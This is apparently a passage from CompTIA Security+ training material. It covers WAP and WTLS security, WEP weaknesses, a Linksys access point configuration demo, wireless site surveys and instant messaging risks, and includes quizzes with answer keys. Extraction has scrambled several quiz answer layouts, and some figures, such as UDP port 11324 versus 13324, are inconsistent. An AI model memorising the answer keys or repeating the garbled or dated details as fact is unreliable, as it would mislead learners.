To gain access to information on the application server, the WAP client (a WAPenabled mobile phone, PDA, and so forth) must take the following steps: 1 The client first makes a connection with the WAP gateway and then sends a request for the content that it wants using WSP. (WSP is similar to HTTP, but its overhead is much smaller than that of HTTP.) 2 The gateway then converts the request into the HTTP format and forwards it to the application server. 3 The application server then sends the requested content back to the WAP gateway. 4 The gateway converts the data using WSP, compresses it, and sends it on to the WAP client. If the WAP client has enabled the Wireless Transport Layer Security (WTLS) protocol (the WAP security protocol discussed shortly), then the data is encrypted between the WAP client and the WAP gateway. WAP 1.x does not require the use of WTSL. If it is not enabled, then all of the data is transmitted to and received from the WAP gateway in plaintext. WAP 2.0 employs TLS rather than WTLS so no conversion is necessary. The data is also encrypted using the Transport Layer Security (TLS) protocol, however, while the WAP gateway is converting the data from WSP to HTTP, and vice versa, there is a brief instantmillisecondswhen the data is not encrypted at all. This moment is referred to as the WAP gap, and it has raised a lot of criticism for WAP in the past year or so. Financial services companies were particularly concerned by this flaw, and many of them chose to set up their own WAP gateways to ensure they had adequate control over who had access to the data while it was in plaintext. The possibility of anyone being able to capture this data and use it maliciously is quite small, but there is still a risk. A hacker would have to have physical access to the WAP gateway, which is usually located within secure premises to ensure that billing information is kept secure. In addition, a hacker would have to sift through all of the traffic pouring through the gateway at an exact moment. Adding to the difficulty is the fact that packets passing through the WAP gateway are never saved, even briefly, in any type of storage mechanism. The whole transaction takes place in flash memory.
815
B-1:
Discussing WAP 1.x

1 The WAP 1.x stack Security layer is similar to which of the following?
A
SSL/TLS HTML TCP IP
B C D
2 The WAP 1.x lower layer is similar to what layers of the OSI Model? (Choose all that apply.)
A B C
IP Data link Physical Security
3 WAP is a proprietary encryption protocol that was created by WECA. True or false?
False: It was created by the WAP Forum.
4 Where does the WAP gap occur? A

B
In the WAP client In the WAP gateway Between the WAP client and the application server Between the WAP gateway and the application server None of the above
C D E
816
The Wireless transport layer security protocol

Explanation In addition to security threats posed by the WAP gap, there have also been a number of proven attacks publicized about the Wireless Transport Layer Security (WTLS) protocol that WAP 1.x employs. Before these flaws are discussed, however, you should understand what WTLS is and how it works. WTLS was designed to provide authentication, data encryption, and privacy for WAP 1.x users. As mentioned, mobile devices have much less memory, computational resources, and battery power than traditional computers. They also experience much greater latency (the time it takes for the data to arrive and be processed) because they send and receive data at a much, much slower rate than computers. If you were using 9600-baud modems back in the early to mid-1990s, perhaps you remember how long you had to wait for a Web page to download. That is about where data transmission rates are now for mobile devices. For these reasons, the WAP Forum chose to develop a scaled-down version of TLS that does not require as much processing power, memory, or battery life. Authentication WTLS allows for three different classes of authentication: Class 1 authentication is anonymous and does not allow either the client or the gateway to authenticate the other. Class 2 authentication only allows the client to authenticate the gateway. Class 3 authentication allows both the client and the gateway to authenticate each other. Class 3 authentication requires the use of a Wireless Identity Module (WIM). A WIM is a tamper-resistant device, such as a smart card, that facilitates the storage of digital signatures and can also perform more advanced cryptography with its enhanced processing power. The WTLS protocol completes Class 2 authentication in four steps, as shown here: 1 Prior to sending a request to open a session with the WAP gateway, the WAP device sends a request for authentication. Its always the client that begins this process, never the WAP gateway. The client can also challenge the gateway again at any time during the session. Both TLS and WTLS differentiate between a connection and a session. A session can exist over many connections. This is especially helpful in wireless communications because connections are not as stable as they are in the wired world. If a connection is broken, the session can continue using the same security mechanisms that were initially established, but its up to the gateway (or server in the case of TLS) to decide whether or not to create a new session with new security parameters. 2 The gateway responds and then sends a copy of its certificate, which contains the gateways public key, to the WAP device. 3 The WAP device then receives the certificate and public key and generates a unique random value. 4 The WAP gateway then receives the encrypted value and uses its own private key to decrypt it.
817
This process works quickly, and requires less overhead, largely because WTLS is using weaker keys than TLS, which does not require very much processing time. Remember that in WAP 1.x, WTLS is optional, so it might not even be turned on, and it only encrypts data between the client and the WAP gateway. The WAP gap is still present between the time the gateway has finished decrypting the data and when it encrypts it with TLS before sending it to the application server. SSIDs Another area of concern is the unsafe use of service set identifiers (SSIDs). SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network. The default SSID values should never be used, nor should SSIDs that help unscrupulous hackers with sniffers to identify your WLAN. These would include such SSIDs as 12th Street Branch Accounting Department or ABC Consulting Firm. Giving your wireless devices more cryptic SSIDs help reduce the likelihood that a hacker will be able to compromise your WLAN(s). Weak encryption keys The weak key used by WTLS has been widely criticized. Some WAP supporters have responded to these criticisms by arguing that the shortcuts taken in WTLS were necessary in order for WAP to adapt to the wireless environment. These weaknesses are real and should be considered when transmitting sensitive information using a WAPenabled device. Although many vendors have already made improvements to WAP 1.x-enabled devices with higher levels of encryption and more efficient processing, it cannot be emphasized enough that WTLS cannot be taken for granted even if the vendor has made these improvements, or even if they simply state that their application incorporates WTLS.
818
The WAP 2.0 stack

In January 2002, the WAP Forum released the Wireless Application Protocol (WAP 2.0) Technical White Paper. This paper specified a new suite of utilities and security enhancements. One of these security enhancements was the release of a new WAP stack that eliminates the use of WTLS and instead relies on a lighter version of TLS, the same protocol used on the common Internet stack, which allows end-to-end security and avoids any WAP gaps. In response to the emergence of higher-speed wireless networks, all of the other layers of WAP 1.x are also replaced by standard Internet layers, which will make wireless data transactions much more efficient. WAP 2.0 still supports the WAP 1.x stack in order to facilitate legacy devices and systems. A comparison of the WAP 1.x and WAP 2.0 stacks is provided in Exhibit 8-4.
Exhibit 8-4: A comparison of WAP 1.x and 2.0 stacks In addition to these changes, WAP 2.0 has added a number of features. These include, but are not limited to: WAP Push Allows content providers to send information, such as stock prices and advertisements, directly to the WAP device without being requested to do so. User agent profile Allows a way to capture and communicate WAP device capabilities and user preferences. Wireless Telephony Application Provides a range of advanced telephony applications including such call-handling services as making, answering, placing, or redirecting calls. External Functionality Interface (EFI) Allows the use of plug-and-play modules to extend the features of the clients applications. It also allows the addition of smart cards, GPS devices, health care devices, and digital cameras. Multimedia Messaging Service (MMS) Provides a framework to enable a richer messaging solution.
819
B-2:
Discussing WTLS protocol and WAP2.0

1 WTLSs Class 2 authentication only allows the client to authenticate the gateway. True or false?
True
2 WTLSs Class 3 authentication requires the use of a tamper-resistant device called a ________________________________________.
Wireless Identity Module (WIM)
3 Put the steps below in the correct sequence to describe a Class 2 authentication. ___ The client generates a unique random value and encrypts it with the public key. ___ The gateway sends a copy of its certificate containing its public key. ___ The client sends a request for authentication to the gateway. ___ The gateway decrypts the encrypted value with its private key. 4 What are SSIDs?
SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network. 3
2 1 4
5 WAP 2.0 uses which of the following as its security protocol? A B

C
TCP SSL TLS WTLS STP
D E
820
Do it!
B-3: Controlling access to the WAP (demonstration only) Heres how Heres why
The Access Point is designed to be functional right out of the box. To implement greater security on your wireless network, you will use Linksyss Web-based configuration utility. (For example, http://192.168.1.251.) The system prompts you for a user name and password.
Introduce this activity as a demonstration. Students should observe only. Steps 1-13 should be done on the Instructors computer.
1 From the Instructors computer, open Internet Explorer
2 In the Address field, enter http:// followed by the IP Address of your Linksys WAP 3 Leave the user name blank In the Password field, enter
admin
Click OK
The configuration utility with the Setup tab active appears. This tab allows you to change the Access Points general settings.
4 Review the settings but leave the AP Name, LAN IP Address, and AP Mode settings at their default values
The AP Name and LAN IP Address were set during the initial setup.
The AP Mode is set to Access Point by default. This connects your wireless PCs to a wired network.
821
To communicate with another Wireless Access Point, you have two options: (1) If within the same network, choose Access Point Client. This will make this WAP a client to the other WAP. (2) If you want to connect two networks together, select Wireless Bridge. This will make the connection to another access point set as a wireless bridge. In both cases, you would specify the other WAP MAC address. To connect three or more networks together, choose Wireless Bridge-Point to MultiPoint. 5 Activate the Password tab
6 Enter a new password Re-enter the new password to confirm 7 Click Apply 8 Enter the new password and click
OK To avoid using the default password. Be sure to choose a complex password. To save the change. To return to the utility
9 Activate the Advanced tab
The Filter tab appears. One method of restricting wireless devices is to create a list of approved users. A list of preapproved media access control (MAC) addresses can be entered into the Filtered MAC Address table in the access point. Only those stations on the ACL will be provided admittance. The Linksys WAP11 provides an option to create and manage an ACL.
10 Select Enabled
Filtering is enabled.
822
CompTIA Security+ Certification 11 Select Only deny PCs with

MAC listed below to access device This will set the MAC Address list to deny listed PCs. The software allows up to 50 MAC Addresses to be specified. If you need to enter more than 10, click on the pull-down menu above the MAC Address fields. Do not use dashes as you enter the address. The MAC Address can be obtained by running ipconfig /all on the PCs command screen. To save the changes. Notice that you'll see a Continue button; it's not necessary to click Continue; the program will return to the previous page automatically.
12 In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer with the wireless adapter (laptop or desktop) 13 Click Apply
This step and the next are done on the computer with the wireless network adapter.
14 From the computer with the listed MAC Address, load Internet Explorer 15 Enter the IP Address of the WAP in the Address field
The page fails to load.
This step is done on the instructors computer.
16 On the Filters tab on the Instructors PC, select Only

allow PCs with MAC listed below to access device
In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer with the wireless adapter Click Apply
This step and the next are done on the computer with the wireless network adapter.
17 From the computer with the listed MAC Address, retry to access the WAP using its IP Address
The page successfully loads.
823
Topic C: Wired equivalent privacy

# 2.6 Objective Recognize and understand the administration of the following wireless technologies and concepts WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol) Vulnerabilities Site Surveys
Introducing WEP
Explanation Wired Equivalent Privacy (WEP) is the optional security mechanism that was specified by the 802.11 protocol to provide authentication and confidentiality in a wireless LAN (WLAN) environment. Even though the IEEE committee recommended that WEP should be used, it also stated that WEP should not be considered adequate security and strongly recommended that it should not be considered without also implementing a separate authentication process and providing for external key management. Before delving into WEP, however, you must first gain an understanding of what a WLAN is and how it operates. A WLAN works to connect clients to network resources using radio signals to pass data through the atmosphere, as depicted in Exhibit 8-5.
Review with students the operation of a typical wireless LAN as depicted here. Notice that critical resources, such as servers and internetwork devices, are still connected using wired technologies so WLANs are frequently really hybrids that incorporate both wired and wireless components.
Exhibit 8-5: Conceptual diagram of wireless LAN
824
CompTIA Security+ Certification In order to do this, it employs wireless access points (AP), as shown in Exhibit 8-6, which are connected to the wired LAN and act as radio broadcast stations that transmit data to clients equipped with wireless network interface cards (NICs), as shown in Exhibit 8-7.
Exhibit 8-6: Netgear ME 102 802.11b Access Point
Exhibit 8-7: 3 Com AirConnect wireless NIC This allows users to stay connected to the network as they move around from place to place within and between the broadcast zones of the various access points (APs) within the WLAN. WLANs use WEP to encrypt and guarantee the integrity of the data passed between the client and the AP and to authenticate clients that are requesting network resources.
How WEP works

WEP uses a symmetric key (a shared key) to authenticate wireless devices (not wireless device users) and to guarantee the integrity of the data by encrypting the transmissions. Each of the APs and clients needs to share the same key in order for this to happen effectively. When a client wants to send data to or request resources from the network, it sends a request to the AP asking for permission to access the wired network. If WEP has not been enabled, and by default it is not, then the AP allows the request for resources to pass through to the wired LAN. If WEP has been enabled, then the client begins a challenge-and-response authentication process.
WEPs weaknesses
WEP has been criticized for having many problems, including problems related to the initialization vector (IV) that it uses to encrypt data and ensure its integrity, and also problems with how it handles keys.
Wireless and instant messaging Initialization vector concerns
825
An IV is a sequence of random bytes that have been appended to the front of the data, which is in plaintext before encryption. There are several problems with the IV: WEP sends the IV in plaintext across the WLAN and, therefore, it can be picked up by a hacker along the way. The WEP IV is only 24-bits long, which means that it can only take 224 (16,777,216) values. The IV is reused on a regular basis. An individual could capture packets and see the pattern of reuse, thus revealing the IV. Researchers have actually broken the 128-bit WEP encryption in as little as two hours using this method. In August 2001, Fluhrer, Mantin, and Shamir published a paper titled Weaknesses in the Key Scheduling Algorithm of RC4. In it, they described an attack that could be made using weak keys created by WEPs IV. They also criticized the fact that the RC4 stream cipher, though effective in many other instances, is rendered useless in WEP because it encrypts messages by concatenating a fixed secret key and known IV modifiers. Key sharing Others have criticized WEP for not requiring asymmetric authentication in which each wireless device would employ its own secret key. At this point, every wireless device in a WLAN shares a common secret key, which means the likelihood of that key getting into the hands of someone who wishes to harm the organization is increased. For example, standard WEP requires the secret keys be manually configured. Rational security implementation then dictates the secret key be changed on every device every time someone leaves the company, if not more frequently, but this would be an administrative nightmare in large organizations. A symmetric key system, in itself, does not do anything to protect critical information from authorized WLAN members who can, intentionally or unintentionally, gain access to resources to which they are not authorized access. Another weakness related to the difficulty associated with rekeying is that if it is not done regularly, hackers have even more time to break into the system. War driving and other issues In addition to the WEP related problems that have been discussed so far, wireless LANs have other security holes. For example, WLAN transmissions can, and often do, extend beyond the confines of the physical structures of the organizations that use them, unlike wired LANs, its much, much easier for people to detect and capture them. Several articles, in such widely read publications as PC Magazine and the Wall Street Journal, describe the amount of information about an 801.11b WLAN that can be collected through war driving. War driving involves driving around using a laptop equipped with a wireless card and an antenna. Craig Ellison wrote an article for PC Magazine in 2001 that described how he was able to use this method to detect 61 APs within a six-block radius of the Ziff Davis office in Manhattan. Of these, only 21% of the networks had actually enabled WEP. The other 79% were broadcasting their transmissions out in plaintext for anyone to pick up. On other war driving trips through Jersey City, Boston, and the Silicon Valley, Ellison easily found 808 networks and only 38% of them were using WEP.
826
CompTIA Security+ Certification In addition to war driving, which is a fairly passive activity, unauthorized users can attach themselves to WLANs and use their resources, set up their own access points, and jam the network in a denial-of-service attack, or use the previously mentioned WEP weaknesses to break into wired LANs by attaching themselves to WLANs that are not separated from the wired LAN by a DMZ. WEP authenticates clients, not users. Unless an additional security method is employed, such as requiring users to provide username/password sets, anyone who gains access to a client that has the shared key is able to break into the system. 802.11i will help in this area, but perhaps the greatest need is in the area of educating wireless network administrators and users about the inherent insecurity of wireless systems and the need for additional care when using them.
WEP key
The 802.11 standard provides an optional Wired Equivalent Privacy (WEP) specification for data encryption between wireless devices to increase privacy and prevent eavesdropping. The access point and each station can have up to four shared keys. Each key must correspond to the same key position in each of the other devices.
827
C-1: Generating a WEP key (demonstration only) Heres how Heres why
1 In the Linksys utility, activate the Setup tab 2 Select Mandatory
3 Click WEP Key Setting
The WEP Key Setting window appears. This window allows you to set WEP encryption.
4 Select 128Bit encryption Leave the Mode set to HEX 5 In the Passphrase field, enter
Paganini1 Your screen should look like this:
Each point in your wireless network MUST use the same WEP encryption method and encryption key or else your wireless network will not function properly.
828
CompTIA Security+ Certification 6 Click Generate

The system will generate four WEP encryption keys based on the passphrase.
7 Click Apply 8 Close the window 9 Click Backup Save the file to your local hard drive 10 Click Apply 11 At this point, you would configure each device in your wireless network with the same configuration and encryption keys. 12 On the Setup window, select Disable under WEP 13 Click Apply
To save the changes. To return to the Setup tab. To store the Access Point configuration on your local PC.
To complete the setup. Automated key generation can only be done when the network adapter is the same brand and model as the WAP. If not, you would need to manually enter the encryption keys in each wireless device. To disable encryption.
829
C-2:
Understanding wired equivalent privacy

1 Why is the initialization vector in WEP considered a security concern?
WEP sends the IV in plaintext across the WLAN, and it can be picked up by a hacker
along the way
It is only 24 bits long It creates weak keys It is reused on a regular basis, allowing the hacker to see the pattern of reuse
2 Describe war driving.

This is the act of using a laptop and an antenna to locate wireless networks around town.
3 WEP authenticates users, not clients. True or false?

False: WEP authenticates clients.
830
Conducting a wireless site survey

Explanation Conducting a wireless site survey is a critical part of designing and implementing a wireless network. It involves understanding the number and requirements of the people who will be served by the network and the physical environment in which the network will be deployed. Preparing for and conducting a site survey allows you to discover how many access points you will need and where they should be placed to provide adequate coverage throughout the facility. The basic steps to conduct a site survey are: 1 Conduct a needs assessment of the network users. 2 Obtain a copy of the sites blueprint. 3 Do a walk-through of the site. 4 Identify possible access point locations. 5 Verify access point locations. 6 Document your findings. The amount of time and energy this process takes depends on the size and shape of the facility and the number and requirements of the users. A larger organization requires more careful analysis of the site, and it might take days or even weeks to conduct a site survey. A site survey of a smaller organization might only require a few hours. Conducting a needs assessment of the network users In this step, its important to gain an understanding of the number of people that the WLAN will serve as well as their data access needs. On the one hand, you might discover there are only a few people who will use the WLAN and that they will not be heavy users of network resources. For example, a small group of upper-level executives who only want to take their laptops with them when they walk down the hall from their offices to the company boardroom. On the other hand, you might discover that almost everyone in a large organization needs to be able to move frequently from one place to another and that each employee is a heavy user of network resources. This might be the case in an engineering firm in which users are part of multiple project teams that need to work together for limited periods of time and then move on to their next project with another group of people. In either case, its important for you to understand both where the users will use their wireless laptops or other devices and how much bandwidth they will need to perform their jobs. Its also important to know if there are any plans to dramatically increase or decrease the number of mobile users. Obtaining a copy of the sites blueprints Radio waves are difficult to predict. An initial understanding of the sites physical layout can give you an idea of how best to place access points so that adequate wireless coverage is provided to mobile users. Like wired networks, wireless LANs also have barriers to the pathways that the radio signals can travel, and you need to know this so you can work around the barriers. One of the best ways to gain this understanding is to obtain a copy of the sites blueprints or, if none are available, create your own floor plan. In this step, you want to notice the position of walls, walkways, elevator shafts, and the locations of any other structural elements that might present challenges to adequate access point coverage.
831
Pay particular attention to materials used to construct the walls, floors, and ceilings of the building. Certain materials tend to reflect some of the signal. Concrete, marble, brick, water, and especially metal are difficult to work around. Doing a walk-through of the site After getting an idea of the layout of the site from the blueprints, its important that you walk through the site to make sure the blueprints are accurate and to identify any other barriers that might affect radio signals. For example, you might notice that partitions, metal racks, or file cabinets have been placed in areas that originally appeared to be wide open. As you walk through the site, you need to identify other devices that operate in the same radio frequency band as your WLAN, such as microwave ovens, medical equipment, military communications equipment, and baby monitors. You also want to observe whether or not there are existing wired network jacks and power outlets that you can use to connect to the physical network and provide electricity to your access points. You might need to determine in which areas of the building it might not be esthetically pleasing to locate an access point and plan to make concessions for that space (such as the company boardroom). Identifying possible access point locations Using the information you have gained in the preceding steps, you should be able to approximate the locations of the access points that will provide adequate coverage for mobile users. Areas that have high concentrations of mobile users require more access points; however, you also need to be mindful of not placing access points too close together in order to reduce interference between access points. You should also have noticed where physical network jacks and electrical sockets need to be installed. Consider the power needs of the wireless workstations that will be in each area and the different types of antennas that might be needed in different spaces. Confirm that environmental conditions are good (not too hot or too cold). Once all of this information has been taken into account, you need to create a draft design of the network from which to work as you go through the next step. Verifying access point locations Before you finalize your network plans, you need to verify your initial approximations of AP location are correct. To do this, you need the proper tools, including at least one access point (and a power cord to connect it to a source of electricity), a laptop equipped with a wireless NIC, and software that can be used to identify the AP and monitor data rates, signal strength, and signal quality. Most wireless equipment vendors include this software with the AP or the wireless NIC, but you can also download free software from wireless LAN vendors, such as Cisco, 3Com, and Symbol. Some vendors provide you with software that not only tests your signal strength, but also provides you with a printout of the results, which will be helpful in your posttest documentation.
832
CompTIA Security+ Certification Once you have gathered all of the appropriate tools, you are ready to begin testing. 1 With your draft design in hand, go to each of the points that you have identified as potential good locations for an AP, place the AP in those locations, and monitor the site survey software to see what the results are as you walk around the intended space. 2 You should also test for the amount of data throughput that is possible at various points in the space. 3 Take detailed notices of these results and identify where you find strong and weak signals. 4 If you are finding weak or dead spots, you need to reposition the AP until you have full coverage of the space. In some cases, you might not find an ideal location and will need to consider adding an additional access point in a location to solve the problem. Documenting your findings Now that you have tested your initial assumptions about AP locations and made any adjustments that were necessary, you need to document your findings. Your final plan will allow for adequate wireless coverage in any area that the users indicated they would need it. Careful drawings should be made and a list of your assumptions should be spelled out. The people who will install the wireless system that you have designed will use your documentation, as might the network administrators who will support the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.
833
C-3:
Performing a site survey (demonstration only) Heres why
Heres how
Introduce this activity as a demonstration. Students should observe only. For this activity, you will need a laptop with a Netgear MA401 PC Card installed. If the Wireless Status icon is not displayed in the system tray download and install the latest version of the Netgear MA401 driver.
1 On the laptop computer, click the Wireless Status icon

A drop-down menu appears.
If you have a different wireless network card, you can right-click the wireless connection icon in the system tray and choose Status. The screens will look different than those shown here, but will have similar information.
2 Choose Wireless Network

Status
The Status screen appears.
3 Monitor the following output: Current Tx Rate Signal Strength Link Quality
Ask a student to roam about the room and identify any objects that influence the signal strength and quality.
4 Roam around the room with the laptop and watch for any changes in transmission rate, signal strength, and link quality
834
Do it!
C-4:
Reviewing the wireless site survey

1 What are the steps needed to conduct a wireless site survey?
The basic steps to conduct a site survey are: 1 Conduct a needs assessment of the network users. 2 Obtain a copy of the site's blueprint. 3 Do a walk-through of the site. 4 Identify possible access point locations. 5 Verify access point locations. 6 Document your findings.
2 Why is it important to document your findings when conducting a wireless site survey?
The documentation is important to communicate your findings in the wireless site survey. The people who will install the wireless system that you have designed will use your documentation, as will network administrators. Its essential to have this information for support purposes on the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.
835
C-5:
Resetting the WAP (demonstration only) Heres why
Heres how
1 In the Linksys utility, activate the Password tab 2 At Restore Factory Defaults, click on Yes
3 Click Apply
To save the changes. The system warns that your connection might be lost.
4 Click Continue 5 Close Internet Explorer
To proceed to reset the WAP to the factory defaults. Your connection will be terminated.
836
Topic D: Instant messaging

# 2.3 Objective Recognize and understand the administration of the following Internet security concepts Instant messaging Vulnerabilities Packet Sniffing Privacy
A definition of IM
Explanation With the proliferation of instant messaging (IM) products comes an equal proliferation of problems and security threats. Five currently available and frequently used flavors of IM include: AOL Instant Messenger (AIM), MSN Messenger, Yahoo! Messenger, ICQ, and Internet Relay Chat (IRC). Each of the five has suffered at least one major security problem. In addition to the security problems inherent in each product, there is also a series of generic problems that a technology manager faces when trying to lock down IM. Unlike e-mail, which uses a store and forward model, IM uses a real-time communication model. When you type a message into an IM client and press the Enter key, the text of that message is immediately sent to the client(s) to which you are currently connected. This model makes IM easy, fast, and extremely dangerous. IM networks operate in either peer-to-peer or peer-to-network configuration. In the peer-to-peer model, client software communicates directly with one another; in the peerto-network model, client software logs onto a network, which then transfers the messages between clients. Both models have pros and cons. The peer-to-peer model does not rely on a central server; so as long as two client software packages are not blocked, they can communicate with one another. This model might cause the client to expose sensitive information such as the actual IP address of the machine on which it is running. The peer-to-network model relies on a central server (or group of servers) and, therefore, there is a risk of a network outage making IM communication unavailable. In addition, denial-of-service (DoS) attacks are becoming more frequent, and this increases the likelihood that IM might not be available when you need it.
IM security issues
The instant messenger client is typically installed on an end-users workstation and provides an interface for end-users to communicate with each other by utilizing the server resources. The server manages and relays all end-user communication and is typically maintained by a service provider such as AOL, Yahoo!, or Microsoft. The server is also responsible for the authentication and notification of user status and availability.

Ask students if they can think of some applications for IM within the work place. Answers might include helpdesk support, remote meetings, and file transfer.
837
Increased deployment of broadband networks, as well as availability of extra capacity in many networks, make instant messaging tools a very popular way of communication both at home and in the work place. The increased usage of these tools also brings about certain vulnerabilities that many organizations fail to understand and address. Many of these services, although very convenient, do not have the security and encryption features that are essential for transportation of sensitive and confidential data. There are serious security concerns regarding the usage of consumer IM systems because these systems can transport sensitive and confidential data over the public networks in an unencrypted form. Corporations have no control over data transported in such fashion once it leaves the corporate network infrastructure. On the other hand, enterprise IM systems are administered in-house, making them considerably more secure than the consumer IM systems. Most popular consumer IM systems share some common security risks that need to be addressed: IM systems typically do not prevent transportation of files that contain viruses and Trojan horses. Such files can spread these dangerous viruses and cause systems to malfunction or cease to function altogether. Misconfigured file sharing can provide access to sensitive or confidential data including personal data, company information, and system passwords. The most visible security risk associated with most IM systems is the lack of encryption. Such applications transfer data in plain HTML format, which can easily be intercepted by an intruder. Sensitive information should always be encrypted and digitally signed before transporting over a public network. The use of a plaintext session can also lead to the session being hijacked, which can be further exploited to obtain sensitive information. IM systems could be utilized for transportation of copyrighted material, which could have substantial legal consequences. These include copyrighted pictures, documents, music files, software, and so forth. Transferring files also reveals network addresses of hosts, which could be used by attackers for malicious purposes such as a Denial-of-Service attack. IM applications typically do not use well-known TCP ports for communication and file transfers; instead, registered ports are used: AOL Instant Messenger uses TCP port 5190 for file transfers and file sharing, but transportation of IM images takes place on TCP port 4443. NetMessenger uses TCP port 1863 for transportation of HTML-encoded plaintext messages. Voice and video feed is relayed via a direct UDP connection on ports 13324 and 13325. Application sharing takes place between clients over TCP port 1503, and file transfers use TCP port 6891 on the initiator or client. Yahoo!s Messenger typically uses TCP port 5050 for server communication and TCP port 80 for direct file transfers. ICQ messages are also unencrypted and sent via TCP port 3570, and voice and video traffic uses UDP port 6701.
838
CompTIA Security+ Certification Safeguards One can configure the firewall to filter some or all of these ports in order to restrict either certain functionalities within corresponding IM applications or to prevent usage altogether. It might be difficult to block the usage of IM systems such as Yahoo!s Instant Messenger because most of its traffic takes place over TCP port 80, which is the standard TCP port for regular Internet traffic. In situations like this, it is also possible to prevent usage by denying access to certain domains because, for instance, Yahoo! Messenger requires the user to be logged onto a specific subdomain. Smart systems such as intrusion detection systems (IDS) could be deployed to monitor and prevent IM traffic. You can have your IDS inspect all inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.
Lack of default encryption enables packet sniffing

One of the key problems facing any IM client is that all messages are passed in plaintext format unless the user takes some specific step to enable encryption. This makes any IM session extremely vulnerable to packet sniffing, especially if that IM session is occurring over an unencrypted wireless connection. There are a few solutions to this problem, including enabling a private channel communication, a step which turns on encryption on some IM products. Most notably the Microsoft NetMeeting offers a secure connection option, which encrypts all traffic between clients. In addition, Enterprise AIM product from AOL and a freeware IM client called Trillian from a company called Cerulean Studios (www.ceruleanstudios.com) both use encryption to protect message contents. Encryption solves only half the problem facing IM; it does nothing to address the issue of social engineering.
Social engineering overcomes even encryption

Social engineering, the obtaining of sensitive data by social means such as pretending to be someone who already has access, is on the rise and is particularly problematic when it comes to IM. IM uses traditional username/password authentication to verify someones identity, its moderately secure. The ease of use that IM provides means that it is possible for someone to gain access to an unguarded terminal and communicate with the world as if they were the actual user of that terminal. In such a case a quick question asked of another employee at a company can easily result in a serious security breach. Unlike e-mail which gives the person being questioned time to decide whether to respond, IM demands an almost immediate decision on the part of the person being questioned. Add to the situation the informal nature of IM, and you have a real problem.
Technical issues surrounding IM

As IM has matured, more features have been added. Current clients allow file transfer, voice, video, whiteboard technology, and the ability to help someone out by taking over their desktops. These features each come with their own security issues, but this unit only addresses the two most troublesome: file transfers and application sharing.
Wireless and instant messaging File transfers
839
The ability to send a file through IM is extremely powerful, but also very dangerous. Unlike e-mail attachments, which can be scanned as they arrive on a corporate server, IM attachments are much more difficult to handle and require an antivirus package on the local machine receiving the attachment. Application sharing The ability to remotely control a computer can be a boon to help desk operators, but it raises several issues. If the remote control software can be triggered by the remote site, then a machine with IM software running might be taken over without anyone knowing it. In addition, if the remote control software is being used by the remote site to connect to a local site that has been physically breached, then all of the actions of the controlling client might be seen by the wrong party.
Legal issues surrounding IM

Like e-mail, IM carries with it a possible threat of litigation or even criminal indictment should the wrong message be sent or overheard by the wrong person. Corporations spend millions each year to safeguard themselves from legal issues surrounding the proper use of e-mail. Proper use chapters abound in employee handbooks, and some businesses have even gone so far as to monitor the content of messages to ensure their employees say nothing inappropriate. IM is currently immune to most corporate efforts to control it. If a corporation allows IM, then they are opening themselves up to a whole raft of legal problems. Unlike email, IM must be monitored in real time, as most IM clients do not keep a saved log of messages unless the user expressly saves a dialog after a session.
Blocking IM
Blocking the use of IM is a straightforward task. If you install a corporate firewall of some sort to block the ports that IM products use, you will make IM unavailable to your employees, as limited blocking of IM is not possible at this time. If your employees should make a convincing case that IM is useful, then the best that can be done is make strong policies and limit IM clients to one or two vendors so you can maximize control.
Cellular phone SMS

Simple Messaging Service (SMS) is a quasi form of IM provided by most cell phone carriers. SMS is extremely similar to IM in that the messages are typed and sent immediately. The tracking of inappropriate messages and the risk of having messages sniffed are both problems with SMS technology.
840
Do it!
D-1:
Discussing instant messaging

1 Which of the following is a function of a typical instant messaging application? (Choose all that apply.)
A
File share Compiler Voice and video communication Chat
B
C D
2 Which of the following is false regarding IM applications? A B

C
These applications typically do not incorporate encryption mechanisms. Misconfigured file sharing within IM applications can lead to unwanted access to personal data. IM applications have built-in mechanisms that prevent the spreading of viruses. None of the above.
3 Specify the TCP or UDP port used for each of the following applications. AOL file transfers NetMessenger messages NetMessenger voice and video traffic NetMessenger file transfers Yahoo! Messenger file transfers ICQ messages ICQ voice and video traffic
TCP port 5190 TCP port 1863 UDP ports 11324 and 13325 TCP port 6891 TCP port 80 TCP port 3570 UDP port 6701
4 List three vulnerabilities associated with instant messaging.

IM uses real-time communications: transaction logging is optional. Messages are passed in plaintext format by default. If a hacker can gain access to an unguarded terminal, he or she can pose a quick
question that requires an immediate response on the part of the person being questioned.
Each client must have antivirus software installed to scan IM messages for viruses. A machine running IM software can be taken over with remote control software without
anyone knowing it. In addition, if the remote control software is used to connect to a local site, all the actions of the controlling client can be seen by the wrong party.
Impossible for corporations to monitor the content of messages.
841
5 What are some of the legal issues surrounding Instant Messaging software in the workplace?
IM carries with it a possible threat of litigation or even criminal indictment should the wrong message be sent to or received by the wrong person (similar to e-mail). Corporations spend millions each year to safeguard themselves from legal issues surrounding the proper use of e-mail. Many times businesses have even gone so far as to monitor the content of messages to ensure that their employees say nothing inappropriate.
842
Unit summary: Wireless and instant messaging

Topic A In this topic, you learned about security issues related to wireless data transfer and 802.11x standards. You learned that IEEE established the 802.11 working groups to create standards of operability related to the interface between wireless clients and their network access points in a local area network environment. In this topic, you learned about Wireless Application Protocol (WAP) and how it works. You learned that WAP is an open, global specification that was created by the WAP Forum to deliver information and services to users of handheld digital devices. In this topic, you learned about Wired Equivalent Privacy (WEP). You learned that WEP is the encryption mechanism that was specified by the 802.11b protocol to provide authentication and confidentiality in a wireless LAN (WLAN) environment. In this topic, you learned about instant messaging. You learned that instant messaging (IM) is a process and application that allows users to send and receive messages in real time. IM can be used on both wired and wireless devices. You also learned that there are serious security concerns regarding the usage of consumer IM systems because these systems can transport sensitive and confidential data over the public networks in an unencrypted form.
Topic B
Topic C
Topic D
Review questions
1 One way to secure a wireless network is to use a: A Firewall B Scrambler
C
VPN
D DMZ 2 A recommended practice for wireless LANS is to: (Choose all that apply.) A Disable file and print sharing B Disable NetBEUI
C D
Enable WEP protection Use a strong encryption key
E All of the above 3 Which of the following can interfere with wireless transmission? (Choose all that apply.)
A
